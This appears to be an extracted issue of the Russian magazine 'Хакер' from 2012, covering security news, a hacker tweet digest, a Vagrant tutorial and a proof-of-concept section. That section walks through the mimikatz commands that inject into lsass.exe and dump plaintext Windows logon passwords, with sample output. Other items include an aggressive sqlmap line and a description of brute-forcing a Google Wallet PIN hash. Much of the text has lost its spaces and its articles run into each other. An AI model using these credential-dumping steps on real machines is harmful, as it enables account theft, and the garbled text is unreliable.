книги хакеры / журнал хакер / 159_Optimized

серединефевраляжителиМосквы(инетолькоони,

Внообэтомпоговоримниже)моглиприсутствовать

налекцииДжеремиБейленсона—основателя лабораторииVirtualHumanInteractionLabвСтэндфордскомуниверситете(vhil.stanford.edu).Будучипрофессором факультетакоммуникаций,Бейленсоннетолькотрудится воднойизсамыхкрутыхлабораторийвиртуальнойреальностивмире,ноиспециализируетсянакогнитивнойпсихологии.Прощеговоря,емуинтересно,какимобразомлюди могутосознаватьсебя,когдафизическиеусловностиперестаютиметьзначение.Лекцияподназванием«Бесконечная реальность»прошлаврамкахдистанционногообразовательногопроектаKnowledgeStream(knowledgestream.ru). Кактыпонимаешь,ключевымсловомздесьявляется«дистанционный».Всемероприятияможносовершеннобесплатнопосетитьлично,приехавв«Цифровойоктябрь»,но можнотакжепосмотретьвпрямомэфиреиливархиве,ведь ихтранслируютвинтернетдлядесятковтысячзрителей. СинхронныйпереводиHD-качествоприлагаются. Джереми Бейленсонначалсвоевыступлениенемногонеобычно

—вместотелемостааудиториипредложилипосмотреть вступительноевидео.Посредством20-минутнойзаписи Бейленсонобъяснил,чтонестанетсегодняфокусироваться натехнологияхиметодологии,таккаквсюинформацию онихможнонайтивСети,норасскажеторезультатахряда экспериментов.Речьшлаоцифровыхаватарахвсамом широкомсмыслеэтогоопределения:практическиолюбой

цифровойрепрезентациичеловеческойличности,будтодо голос,переданныйпоSkype,персонажонлайновойигрыили воссозданнаяприпомощиспециальногоПОточнаявиртуальнаякопияреальногочеловека.НапримерахБейленсон рассказывал,какчеловеквоспринимаетсебя,втехили иныхвиртуальныхусловиях,в«телах»различныхаватаров. Кпримеру,пациентожоговогоотделениявовремяперевязки,разумеется,испытываетболь.Ноисследованияпоказали,чтоеслинаголовупациентуодетьшлемвиртуальной реальности,которыйперенесетеговхолодныймир,где многоснега,льда,потрясающейкрасотыкристалловитак далее,ощущенияболиснижаютсяедвалинена90%.

ПоокончаниивидеоДжеремиужеличноприсоединился кбеседе,немногодополнивизложенноевролике.Наступилаочередьтрадиционныхвопросовиззалаибеседы сэкспертами.Аудиторияинтересовалась,неаватарли, часом,самБейленсон,чтождетнасвбудущем,опасноли

оставлятьвсетитакназываемые«цифровыеотпечатки»(то естьпрактическилюбыеследы)и,конечно,необошлосьбез обсужденияпотенциальноговреда,которыйможетнанести человекуизлишнеепогружениеввиртуальность.

Стоитзаметить,чтодругиелекциипроектаKnowledge Streamсвободнодоступнынасайтепроектаитожестоят ознакомления.Кпримеру,недавнолекциючиталДжон ПерриБарлоу—основательивице-председательElectronic FrontierFoundation,экспертпокомпьютернойбезопасности, атакжепоэтиэссеист.Дискуссияокопирастах,авторских правахисвободеинформациивышлакрайнеинтересной.

ДистанционныйобразовательныйпроектKnowledgeStream былзапущеносенью2011года Центромновыхтехнологий итехнологическогопредпри-

нимательстваDigitalOctober.ГенеральнымпартнеромKnowledge Streamвыступаеткомпания «Ростелеком»,интеллектуаль- нымпартнером—«Российская венчурнаякомпания».

#hackertweets

@n00bznet:

./sqlmap.py -u http://url/ --crawl=5 --level=5 --risk=3 --threads=10 <~ Ты может быть и нуб, но ты нуб

с базой данных!

Комментарий:

Шутки шутками, но sqlmap — действительно крутая тулза для эксплуатаций SQLi-дырок.

@ChrisJohnRiley:

Я предлагаю заменить выражение «как отнять конфетку у ребенка» на «как обойти

антивирус»… По сути — одно и то же :)

Комментарий:

Обхождение антивируса, чаще всего, не самая сложная задача при пентесте, тут Крис прав...

@corelanc0d3r:

Один из моих фаззеров упал с крешем, — плохо, что не эксплуатируемо :)

@geovedi:

Нерды — просто люди, которые горят чем-то достаточно, чтобы тяжело над этим работать.

@clarkysj:

Дорогой Гугль, я успешно получил 5 уведомлений, 18 е-майлов и 6 поп-апов о том, что ты

меняешь политику конфиденциальности. Пожалуйста, пошли мне еще.

@thealuc:

Это неплохая идея, делать журналирование истории консоли на твоем веб-сервере: >(tee

-a ~/.bash_history | logger -t «$USER[$$] $SSH_CONNECTION»)

@FirefoxNightly:

ASLR теперьобязателен длявсехdll-модулейвпла- гинах(дляВинды) таккак

не-ASLR модулимогутразрушитьвсю безопасностьhttp://t.co/IQFdZrZ4

Комментарий:

Хороший ход для Firefox, но...

@pa_kt:

Эксплуатация CVE-2011-2371 (Firefox reduceRight) без использования не-ASLR модулей:

http://t.co/3uNU3Jjj

Комментарий:

...но этого не достаточно! Увлекательное чтиво про эксплуатацию дыры в Firefox с обходом DEP и ASLR. Причем ASLR обходится не через ROP

в не-ASLR модулях, а через утечку базового адреса dll и уже последующего построения ROP-программы для полученной dll’ки.

@FreedomCoder:

Не эксплойты ломают код. Разработчики ломают код...

@joshcorman:

Подсказка: название White Paper не поднимает ваш текст магическо-автоматическим

способом на уровень «Суперлидерского- исследования-в-области-ИБ».

@f1nux:

Пожалуйста, почему... Ну почему же мы до сих пор плачем каждый раз, когда происходят кося-

ки с SSL. Ведь он и так умер несколько лет назад. Настало время тихой скорби...

Комментарий:

И действительно, SSL вымирает, но мы еще держимся за него. Но и уязвимости, и провалы доверенных корневых центров, — все это лишь подрывает доверие.

@RomiSphinX:

«Физика — как секс: конечно, может дать некоторые практические результаты, но не из-за

этого мы ей занимаемся.» (с) Доктор Ричард Фейнман <3

Комментарий:

Ричард Филлипс Фейнман (англ. Richard Phillips Feynman; 11 мая 1918 — 15 февраля 1988) — выдающийся американский ученый. Основные достижения относятся к области теоретической физики. Один из создателей квантовой электродинамики. В 1943—1945 годах входил в число разработчиков атомной бомбы в ЛосАламосе.

@mathias:

Валидный JavaScript: try { x; } catch( _ _ ) { console. log('CODE, Y U NO WORK '); }

http://t.co/RTJaNUij

Комментарий:

Забавное мини-исследование на тему наименований переменных в JavaScript. Может быть годным для обхода фильтров, например :)

@daveaitel:

WP ftw! Удаленный доступ

с правами SYSTEM для наиболее популярной (в области продаж)

системы удаленного администрирования? Без аутентификации! Symantec pcAnywhere 12.5 выполнение произвольного кода.

@i0n1c:

Я потерял 80 фолловеров с тех пор как объявил, что, возможно, один из них ответственен за

взлом экс-министра обороны.

@evacide:

Визуальный язык интернетконфиденциальности в основном о защите маленьких девочек-

блондиночек.

НАСВИСТИМНЕССЫЛКУ

ЗВУКОВОЙАНАЛОГQR-КОДОВГОТОВКРАБОТЕ

БесплатноеприложениеSonic Experiences,которое предоставляетдоступковсемописаннымфункциям,уже вышлоидоступно вверсияхдляiPhone иAndroid.

последнеевремямычастенькоупоминаемнастраницахжурнала

ВQR-коды,даисаминередкопользуемсяимивжизни.Технологиядей- ствительноудобнаяи,соответственно,набирающаяпопулярность.

Но,думаем,многиесогласятсястем,чтоневсегдаудобнопытатьсянавести камерусмартфонанакакой-либообъект,переживаяотом,хорошолиего видно.КомандестартапаSonicNotify(sonicnotify.com),очевидно,недавалапо- коятажемысль,иизнееродиласьноваятехнология—своеобразныйаналог QR-кодов.Звуковой.

Позадумкеразработчиков,устройстванабазеiOSиAndroidмогутна ультразвуковыхчастотахобмениватьсяданныминебольшогообъема.Кпримеру,возможностейSonicNotifyвполнедостаточнодляпередачиссылкииее мгновенногооткрытиянателефоне.Крометого,ультразвуковойсигналможно интегрироватьвлюбоймузыкальныйтрекилизвуковуюдорожкувидеоролика,чтобыслушательмогполучитьдоступкдополнительнойинформации.

Метаданныеможновстроитьвлюбуюаудиотрансляцию,что,помнению создателей,будетвостребовановмузеяхиливыставочныхгалереях,для обеспеченияпосетителейразнообразнымисведениямиобэкспонатахиих авторах.Наконцертахтехнологияпозволит,кпримеру,открытьсайтисполнителя,илиобнаружитьстраницустекстомисполняемойпесни.Признаемся, намнаумпочему-топриходятнемузеиигалереи,анесколькоиныеварианты применениятехнологии:).

ANONYMOUSСЛУШАЕТ

ОТВЕЗДЕСУЩИХХАКЕРОВНЕМОГУТ УКРЫТЬСЯДАЖЕФБРИПОЛИЦИЯ

слибынамвздумалосьписатьобовсехдеяниях Е хактивистовAnonymous,то,наверное,пришлось

быучредитьотдельноедополнениекжурналу. Однаконекоторыепроделкихакеров«бесчисленноголегиона»всежедостойныупоминания.Например,впрошлом месяцеиз-занихздоровоопозорилисьФБРиполиция Скотланд-Ярда.ПосообщениюБи-Би-Си,вянваретекуще- гогодахакерыкаким-тообразомподслушалителефонный разговормеждуэкспертамиФБРиполиции!Входебеседы сотрудникиоргановкакразделилисьинформациейосамихAnonymousиобсуждалипланыарестачленовгруппы, включаядатыиимеющиесядоказательства.ХакерывыложилизаписьразговоранаYouTube,гдеонадоступнадо сихпор:youtu.be/pl3spwzUZfQ.

Крометогобылиопубликованыфрагментыпереписки поэлектроннойпочтемеждуСкотланд-ЯрдомиФБР,где прекрасновидныадресаостальныхучастниковконференции(pastebin.com/8G4jLha8).

ФБРужеподтвердилофактперехватаинформацииизаявляет,чторазыскиваетвиновников.Подразделениепо борьбескиберпреступностьюСкотланд-Ярдатакжесооб- щает,чтоинцидентрасследуется.Правоохранительным органамявнооченьинтересно,какимобразомАнонимы смоглизаполучитьзапись.

КАКВЫЖИВАЕТRAPIDSHARE

АДВОКАТИЗВЕСТНОГОФАЙЛООБМЕННИКАДАЛИНТЕРВЬЮ

«известныхмест»поразмещениюпиратскогоконтента.Как«рапиде»удалось уйтииз-подприцелаправообладателей,рассказалресурсуTorrentFreak адвокаткомпанииДэниелРеймер.Приведемсамыеинтересныетезисыизего рассказа:

RapidShareвсегдапопервомутребованиюправообладателейудаляет любыефайлы,размещенныеунихнахостинге.Этимзанимаетсяспециальный отдел—anti-abusedepartment.

Компанияразработаласпециальныйкраулер,которыйпостоянномониторитфорумы,доскиобъявленийиварезныеблогивпоискеинформациионарушенииинтеллектуальныхправ,которыеимеютместовсистемеRapidShare. Собраннаяинформацияоценивается,проверяетсяиобрабатываетсявсетем жеотделом.Конечно,Реймеротказалсясообщитьподробностиокраулереили назватьидентификаторбота.Ноотметил,чтоэто«весьмасложнаятехнология»,способнаяобойтипрактическилюбыеспособызащитыфорумовотнезарегистрированныхпользователей.

Ещевдекабре2010годакомпанияпотратилабольшиеденьги,наняввысокооплачиваемуювашингтонскуюфирмуDutko,котораяимеетдоступввысшие эшелонывластиитамотстаиваетинтересыRapidShare.ВзадачуDutkoтакже входитработанадимиджемRapidShare.

Ещеодинважныйкозырьживучегофайлообменника—отсутствиепар- тнерскойпрограммы.Таковые,помнениюправообладателей,стимулируют пиратство.

ВRapidShare уверены:файловый хостингдолжен выглядетькак приличныйсервис вродеDropbox'а,как респектабельная компания,которая занимаетсяисключительнолегальным бизнесом.

ОБНОВИЛСЯЛЕГЕНДАРНЫЙМЕДИАПЛЕЕР

VLCОБНОВИЛСЯДО ВЕРСИИ2.0TWOFLOWER. СРЕДИУЛУЧШЕНИЙ: ЭКСПЕРИМЕНТАЛЬНАЯ ПОДДЕРЖКАДИСКОВ BLU-RAYИНОВЫХФОРМАТОВ.

ВЗЛОМGOOGLEWALLET

ПОДБИРАЕМPINКВИРТУАЛЬНОМУБУМАЖНИКУ

лектроннуюплатежнуюсистемуGoogleWallet

Эзапустилиещевсередине2011года.Разработка предназначенадляAndroid-смартфонов,имею-

щихNFC.Используетсяданнаясистемадляплатежей побеспроводнойсвязималогорадиусадействия.То естьGoogleWalletпозволяетрасплачиватьсязапокупки

вмагазинахспомощьютелефонаиустановленногонанем специальногоприложения.Этонечтоиное,как«виртуальныйбумажник».

Кстати,подобнаятехнологияиспользуетсядляоплаты проездавЛондонскомметроивметроЯпонии.Дляперечислениясредствзапокупкуилипроезднужнолишь провестителефономрядомстерминаломоплаты.

Вопросбезопасностиподобныхплатежныхсистем всегдабылактуальнойтемой.Googleзаверял,чтоGoogle Walletотличнозащищен,—кпримеру,используетмикро- схемуSecureElement,гдевзашифрованномвидехранит пользовательскиеданные.ОнаотделенаотсамоготелефонаиОС,такчтотолькоGoogleWalletможетработать

сней.

Но,какпоказываетпрактика,все,чтосоздано изащищеночеловеком,можетбытьимжеивзломано.

Оказалось,подобратьPIN-кодккошелькуможнопутем брутфорса,дажебезобращенияксерверуGoogle!Виной всему—уязвимостивархитектуреприложения.

СпециалистпобезопасностиДжошуаРубин,сотрудникzveloLABS,решилвнимательноизучитьвнутреннюю базуданныхsqlite3,гдеGoogleWalletхранитвсюинформацию.Вбазеобнаружиласьтаблицасостраннымназваниемmetadata.Втаблицебыловсеготристроки,новкаждой изних—крупныйблокбинарныхданных.

Одинрядназываетсяgmad_bytes_are_fun—этонечто вродезашифрованнойфайловойсистемыдляхранения данных.Содержимоебинарныхданныхвэтойстрокеявно предполагает,чтотамнаходитсявсяинформацияобанковскойкарте,пишетРубин.

ДругаястроканазываетсяdeviceInfo,идляпонимания этихданныхпришлосьвыяснить,чемониобработаны. ДанныеоказалисьскомпилированыприпомощипротоколаProtocolBuffers.Этооткрытаябиблиотекадляунификацииданныхвсообщенияхмеждусистемами.Чтобы прочитатьэтиданные,необходимоуказатьправильный messageformatвфайле.proto(ProtocolBufferBasics:Java). Сделавподходящий.proto,ДжошуаРубинсумелпрочесть данныеибылглубокошокирован.ОбнаружилисьUnique UserIDs(UUID),информацияобаккаунтахGoogle(GAIA)

иCloudtoDeviceMessaging(C2DM,пуш-уведомления), статусGoogleWalletSetup,параметр«TSA»(видимо, TrustedServices),статусSE,исамоеглавное—данные CardProductionLifecycle(CPLC)иPIN-код!

ХэшPIN-кодахранитсявзашифрованномвиде

вSHA256.НознаядлинуPIN-кода(аэточетырецифры), достаточнопопробоватьмаксимум10000хэшейSHA256, такчтокриптографическаязащитаперестаетбытьпро- блемой.PIN-кодподбираетсяменеечемзасекундудаже насмартфоне,такчтосмыслограничениянапятьпопыток вводанасервереполностьютеряется,какисмыслвсей системыбезопасностиGoogleWalletвообще.Эксперт zveloLABSсообщает,чторазработчикиGoogleужепроинформированыобуязвимостиисейчасстараютсякак можнобыстреезакрытьдыру.Посмотреть,какРубин демонстрируетуязвимость,можноздесь: youtu.be/P655GXnE_ic.

ДОВЕРИЕКSSLСЕРТИФИКАТАМПАДАЕТ

ПРОШТРАФИЛСЯЕЩЕОДИНУДОСТОВЕРЯЮЩИЙЦЕНТР

КомпанияGoogle планируетвообще отключитьонлайновыепроверки аннулированных SSL-сертификатов вбудущихверсиях Chrome.Ихзаменят офлайновойбазой аннулированных сертификатов,обновлятьсякоторая будетчерезсофтверныеапдейты.

череднойкамешекупалвогородсертификатовSSLвчаст-

Oностиивсехнынешнихцентровсертификациивцелом. ЦентрсертификацииTrustwaveпризналфактвыдачитакого

сертификатакоммерческойкомпаниидляеекорпоративнойсети. СразупослеэтогобылсоздансоответствующийтикетвBugzilla,иначалосьактивноеобсуждениевгруппеmozilla.dev.security.policy.Если удостоверяющийцентррадикоммерческойвыгодыпозволяетсебе выдатькорневойсертификатнекойнепонятнойкомпании,этодействительноможетобернутьсянепредсказуемымипоследствиями. Фирмаможетподписатьчтоугодно,необращаясьвудостоверяющий центр,истановитсявозможнойатакатипаman-in-the-middleидаже прослушказащищенноготрафикапоSSL/TLS.

ВитогепроектMozillaразослалвсемудостоверяющимцентрам, корневыесертификатыкоторыхпоставляютсявсоставеFirefox

идругихпродуктовMozilla,письмостребованиемотозватьвсевыданныесторонниморганизациямвторичныекорневыесертификаты

иуничтожитьиспользуемыедляхраненияэтихсертификатовHSMмодули.Удостоверяющиецентрыдолжнывыполнитьэтитребования до27апреля.Еслижетребованиянебудутисполнены,Mozillaгрозитсяисключитьсертификатывсехнедобросовестныхудостоверяющих центровизсвоегосписка.

ЦЕНЗУРАВTWITTER ИBLOGGER

ИНТЕРНЕТ-КОМПАНИИБУДУТ ВЫБОРОЧНОФИЛЬТРОВАТЬКОНТЕНТ

еподнимаяшума,компанияTwitterобъявилаотом,что

Нвпредьбудетблокироватьсообщенияпользователейв«отдельныхстранах»,чтобыавторыненарушалипринятыетам

нормы.ТакоесообщениепоявилосьвкорпоративномблогеTwitter. Тамжепоясняется,чтопомерерасширениясервиса,онстановитсядоступенвстранах,гдеиначесмотрятна«пределысвободы самовыражения».Внекоторыхстранахэтипределытаковы,что существоватьтамTwitterнеможетвовсе,нужна«географическая цензура».Покакомпаниянеприбегалакновымвозможностям, подчеркиваетсявблоге.Разумеется,пользователинезамедлили выразитьсвоевозмущениеэтимнововведением,ипротестподдержалодвижениеAnonymous.СитуациюпоспешилпрокомментироватьисполнительныйдиректорTwitterДикКостоло.Поего словам,системафильтрациитвитов(илицелыхаккаунтов)нужна недляосуществленияцензуры,адлятого,чтобысервисвообще смогпродолжитьработувопределенныхгосударствах.Сообщения будутфильтроватьсяисключительнопозапросувластейитолько дляпользователейсервисавконкретнойстране.Слабоекакое-то утешение.

БуквальнонаследующийденьпослеэтогозаявленияещеиGoogle сообщил,чтоотнынекомпаниятожеможетблокироватьдоступкотдельнымблогам,создаваемымнасервисеBlogger,потребованию правительствопределенныхстранмира.Впрочем,Googleхотябы оставляетчитателямблоговвозможностьотключитьпереадресацию.

WOLFRAMALPHA—БАЗА ЗНАНИЙИНАБОРВЫЧИСЛИТЕЛЬНЫХАЛГОРИТМОВ, которуючастоошибочно называютпоисковиком,подвергласьсамомузначительномуобновлениюзапоследние годы.БылапредставленапродвинутаяверсияWolframAlpha Pro.ПодписканаPro-версию обойдетсяв4,99$вмесяц (2,99$длястудентов),но сейчастакжепредоставляется ибесплатныйтестовыйпериод длительностью14дней.

ПОДАННЫМOCCASSIONAL GAMER,большаячасть рынкасмартфоновнабазе WindowsPhone7(55%)принадлежитHTC.Следомидут Samsung(28%),LG(12%)

иNokia(4%).

INTELПРЕДСТАВИЛАпро- цессорыCorei5-2380P,i5- 2450Pиi5-2550Kнамикро- архитектуреSandyBridge. Главноеотличиеновинок— заблокированныйGPU.

ОБОКОНЧАНИИСЛУШАНИЙ ПОДЕЛУTHEPIRATEBAYИНЕ ТОЛЬКО

ПОСЛЕДНИЕСВОДКИОПОПУЛЯРНОМТРЕКЕРЕ

«Качайтемоикнигибесплатно и,еслионивампонравятся, купитебумажнуюкопию.Это верныйпутьзаявитьиндустрии отом,чтожадностьведетвникуда».ПаулоКоэльо.

акизвестно,судебныйпроцесс—штуканебыстрая.Раз-

Кбирательствовотношенииадминистрации«Пиратской бухты»исключениемизэтогоправилонеявлялось—суд

длилсяс2008года.

Новость,пришедшаявначалефевраля,подводитподэтимпроцессомопределеннуючерту(хотяинельзясказать,чтовсекончилось). Деловтом,чточетверооснователейThePirateBayпроиграливВерховномсудеШвециисвоюпоследнююпопыткуапелляции.Судотклонил ихапелляцию,оставиввсилеприговоротноября2010года,который предусматриваеттюремныесроки4,8и10месяцев,атакжевозмещениеправообладателямущербавразмере46миллионовкрон(около 6,8млндолларов).Поидее,теперьГоттфридСвартхольм,Фредерик Нейж,ПитерСундеиКарлЛундстремдолжныотправитьсявтюрьму. Утешаетлишьто,чтоввидунюансовшведскойсудебнойсистемы (атакжепотому,чтонекоторыеизобвиняемыхболеенепроживают

вШвеции)основателиTPBненамереваютсяниотбыватьсрок,ниплатитьденьги.Напротив,онипланируютобратитьсявСудЕвропейского союзаиборотьсядальше. ХотясамThePirateBay.orgвприговоресуда нефигурирует,ипрямогопостановленияоегозакрытиинет,нынешняя администрация(ккоторойупомянутаячетверкауженеотносится,на данныймоментвкоманденеосталосьниодногоизтех,ктоначиналэто дело),решилаперестраховаться.Самыевнимательныенашичитатели наверняказаметили,чтовфевралетрекерпереехалвшведскуюдоменнуюзону.SE,гдеиостаетсянамоментнаписанияэтихстрок.Таким образом«Пиратскуюбухту»укрываютотамериканскихправоохранительныхорганов,которыетожедавноточатзубнапопулярныйресурс. ПотемжепричинамTPBвэтоммесяценачалактивныйпереход

наmagnet-ссылкивместоtorrent-файлов.Еслинасерверах«Бухты» небудетничегокриминального,дажеtorrent-файлов(каковые,

вобщем,тоженеявляютсячем-топлохим,ноэтоещенужнодо- казыватьвсуде),оборонятьсятрекерустанетещелегче.Ктомуже, этопозволяетздоровоэкономитьместонасерверах.Пользователи torrentfreak.comужепроверилипоследнееутверждение:поих данным,общийразмербазытрекерасейчассоставляетвсего164 мегабайта,или90мегабайтвархивированномвиде!Вотуждействительно,компактностьналицо.Но,помимосудовипереездов, администрация«Бухты»по-прежнемуборетсязасвободуинфор- мациивцелом.Яркийтомупример—экспериментпопродвижению писателей,музыкантовидругихтворцов—ThePromoBay.Первым «продвигаемым»(хотя,конечно,скорееэтоонпродвигалданный проект)сталписательПаулоКоэльо,чьелицонедавноможнобыло наблюдатьнаглавнойстраницеThePirateBay.Оказывается,Пауло тоженеодобряетSOPAипишет,чтопродажиегобумажныхкниг тольковырослистехпор,какчитателиразместилиихнаP2Pсайтах.Вцелом,авторскиераздачиненовость,нотакойрекламы им,пожалуй,ещениктонеделал.Коэльопризвалвсехтворческих людейподдержатьидеютрекера.

ХАКЕР 04 /159/ 2012

015

ЗАДАЧА

Один из важных плюсов облачных сервисов — возможность быстро поднять столько серверов, сколько нужно. Хочешь два — будет тебе два. Хочешь сто — два клика мышью и будет сто. Все зависит только от твоего кошелька, платформа же позволяет развернуть столько виртуальных серверов (с нужными ресурсами), сколько тебе нужно. С виртуальной машиной на домашнем компьютере такой фокус не проходит. Чтобы создать виртуалку, задать ей нужные настройки и, что муторнее всего, установить ОС, уходит уйма времени. В один момент мне стало интересно: а можно ли как-то автоматизировать процесс и разворачивать новые виртуальные машины по-настоящему быстро? Ну, то есть указать что-то вроде: «Хочу три виртуальные машины с такими-то настройками и установленную на них Ubuntu последней версии» — и получить эти три виртуальные машины без лишнего геморроя. В поисках подходящего решения я наткнулся на открытый проект Vagrant (vagrantup.com).

РЕШЕНИЕ

Используя в качестве основы бесплатный и потому особенно любимый нами Oracle's VirtualBox (4.0.x или 4.1.x), Vagrant позволяет создавать и конфигурировать виртуальные машины динамически.

Как это происходит, предлагаю рассмотреть прямо на примере. Загружаем с downloads. vagrantup.com нужную версию дистрибутива (есть версии для Windows, Linux, Mac OS X) и поднимаем наш первый инстанс (виртуальную машину):

$ vagrant box add lucid32 http://files.

vagrantup.com/lucid32.box $ vagrant init lucid32

$ vagrant up

Три команды — и новая виртуальная машина с установленной ОС запущена (если, конечно, ты не забыл предварительно установить VirtualBox)! Как несложно догадаться,

команда «box add <имя виртуальной машины>» отвечает непосредственно за создание виртуальной машины.

В качестве параметра ей передается путь до специального box-файла — контейнера, позволяющего быстро развернуть на виртуальной машине нужную ОС. Мы указали не просто путь, а ссылку: в этом случае Vagrant сам выкачивает из сети образ.

Команда «init» инициализирует ОС, причем в качестве параметра необходимо указать тип системы: в нашем случае это 32-битная Ubuntu Lucid (10.04).После выполнения этих двух команд создается полностью работоспособная виртуальная машина с 512 Мб на борту. Последняя команда — «vagrant up» — лишь запускает ее в фоновом режиме.

Таким образом можно создавать и запустить нужное количество виртуалок. Управлять всем этим хозяйством можно опять же через консоль Vagrant. Работающую виртуальную машину можно оставить:

vagrant suspend

Чтобы посмотреть статус каждой из виртуальной машины, есть специальная команда для мониторинга:

vagrant status

К любой из гостевых ОС можно подключиться по SSH, используя сам Vagrant:

vagrant ssh

Если запустить приложение без параметров, то оно выдаст список всех доступных команд.

Параметры гостевых ОС можно отконфигурировать (например, прописать статические IP), задав нужные настройки в специальном скрипте Vagrantfile, который пишется на Ruby. С его же помощью можно, к примеру, пробросить порты до нужной тебе виртуальной машины. И, конечно же, ты можешь создавать свои box-файлы, из которых далее быстро развертывать гостевые ОС.

ЗапусквиртуальноймашинычерезVagrant

Насайтеvagrantbox.esдоступныобразыразныхОСдля быстрогоразвертывания

КодпроектанаписаннаRuby

Proof-of-Concept

ИЗВЛЕЧЬПАРОЛИПОЛЬЗОВАТЕЛЕЙ WINDOWSИЗПАМЯТИ

О ЧЕМ РЕЧЬ?

Не так давно мы делали комплексный материал о том, как можно сдампить пользовательские пароли из Windows-системы. Утилита Windows Credentials Editor – одно из наиболее известных

и универсальных решений. Однако недавно французские исследователи выпустили совершенно убойную наработку mimikatz (blog.gentilkiwi.com/mimikatz). Помимо уже известных приемов, она умеет... извлекать пароли пользователей в открытом виде. Правда, только тех, которые осуществили вход в системе. Сначала мы подумали, что это фэйк и подстава, но первый же запуск утилиты подтвердил — все работает. Прога предоставляет свою собственную консоль, из которой можно запустить необходимые модули для различных ситуаций (концепция «швейцарского ножа»). Для извлечения паролей в виде открытого текста понадобится всего три команды:

mimikatz # privilege::debug

mimikatz # inject::process lsass.exe sekurlsa.dll

mimikatz # @getLogonPasswords

Французскийвыводmimikatzнедолжентебяпугать

КАК ЭТО ВЫГЛЯДИТ?

Попробуем mimikatz. Вывод будет на французском языке, но тебя это не должно пугать: чтобы увидеть пароли, не нужно говорить на языке Шарля Де Голля:

mimikatz # privilege::debug

Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll

PROCESSENTRY32(lsass.exe).th32ProcessID = 488

Attente de connexion du client...

Serveur connecté à un client !

Message du processus :

Bienvenue dans un processus distant

Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécu-

rités dans LSASS

mimikatz # @getLogonPasswords

3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }

КАК ЭТО РАБОТАЕТ?

Казалось бы: нафига хранить пароли в открытом виде, если выполнить авторизацию можно даже с помощью хэша? На самом деле, последнее возможно не везде. Поэтому в винде есть специальный поставщик безопасности wdigest (technet.microsoft.com/ en-us/library/cc778868(WS.10).aspx), чтобы поддерживать такие типы авторизации как, например, HTTP Digest Authentication

и другие схемы, где необходимо знать пароль (и хэша недостаточно). Напоследок скажу, что буквально в момент выхода журнала в печать аналогичный функционал появился и в упомянутой выше утилите WCE. z